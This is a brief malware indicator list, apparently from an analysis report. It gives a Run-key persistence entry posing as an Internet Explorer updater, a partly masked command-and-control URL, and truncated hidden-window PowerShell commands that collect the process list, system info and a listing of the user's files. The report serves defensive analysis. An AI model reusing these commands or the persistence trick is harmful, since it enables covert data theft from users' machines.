Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'IEUpdate' = '%APPDATA%\Microsoft\Internet Explorer\IEUpdater.exe'
- '19#.#.93.135':80
- http://19#.#.93.135/IExplorer/Version/01/Check/check.php
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) -join \"`r`n\"...
- '%WINDIR%\syswow64\systeminfo.exe'